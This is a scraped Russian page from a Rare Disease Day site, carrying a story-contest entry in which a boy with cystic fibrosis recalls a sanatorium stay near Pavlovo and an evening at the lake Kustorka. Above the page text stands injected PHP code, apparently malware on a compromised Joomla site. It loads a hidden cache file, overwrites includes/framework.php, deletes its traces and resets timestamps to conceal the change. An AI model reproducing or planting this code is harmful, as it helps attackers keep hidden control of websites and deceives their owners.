$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } О чем написать,какой выбрать день? Ведь их было так много!
logo
 

28-02 международный день редких болезнейМеждународный день редких болезней

До дня редких болезней осталось

 
Home Вы находитесь здесь: Главная страница Конкурс "Напиши историю" Рассказы О чем написать,какой выбрать день? Ведь их было так много!
О чем написать,какой выбрать день? Ведь их было так много!

 

Размышляя о самом редком ,интересном дне моей жизни я столкнулся с трудностями. О чем написать,какой выбрать день? Ведь их было так много! Может рассказать о поездке в аквапарк в Казани или об экскурсиях в Макарьевский монастырь , в Пятигорск,в Москву. Потом мой взгляд упал на фотографии висящие на стене. На них были запечатлены удивительные места , где я был счастлив не один день! Меня осенила мысль: вот о чем надо написать- когда я впервые увидел и осознал незаметную на первый взгляд красоту нижегородского края,где я родился и вырос. Начался этот прекрасный летний день с поездки в санаторий «Солнечный» , находящийся недалеко от города Павлово.Туда я отправился поправлять здоровье после длительного пребывания в больнице, где получил огромную дозу антибиотиков. Впечатления от дороги подняли мне настроение. Я открыл для себя новые, удивительные места. Особенно мне понравился город Павлово, где увидел много старинных зданий, великолепный храм на берегу реки, понтонный мост, по которому мы переправились через Оку. После трехчасовой дороги мы оказались в санатории ,расположенном в сосновом бору. Могучие деревья окружали нас со всех сторон , свежайшим воздухом ,казалось, невозможно было надышаться. После больничной палаты мне все здесь показалось чудом : столетние сосны встречали меня, радостно покачивая вершинами, ноги утопали во мху, сквозь который пробивались рыжие лисички и румяные сыроежки. Врач санатория назначил мне много процедур , в том числе неприятное для меня лечение грязями. Но чего только не перенесешь , чтобы стать здоровым. К счастью, я там встретил знакомых мальчишек- двойняшек, тоже больных муковисцидозом. Они мне рассказали о чудесном озере ,расположенном недалеко, под горой. Это было старое русло реки Оки. К вечеру мы отправились туда .Озеро было действительно сказочное ,называется оно Кусторка. Что же мы увидели там? В зеркальной воде , отражаясь в лучах заходящего солнца , качались прибрежные кустарники, деревья , стоящие плотной стеной у самой воды, цветы.... «Смотри , цапля летит!»- закричали мальчишки. У берега в водорослях она показалась с лягушкой в клюве. Мы стояли очарованные. Я, не выдержав ,схватил фотоаппарат и стал делать снимки. Сейчас дома у меня часть снимков хранится в альбоме, другая – в рамках украшает мою комнату. Я часто смотрю на них , вспоминаю этот счастливый день . когда я получил огромный запас энергии, духовных сил ,бодрости и здоровья.

Иванов Алексей

 
Главная | О дне редких | Мероприятия | Фото и видео | Стать другом | Конкурсы

Разработка сайта: DriveLab.ru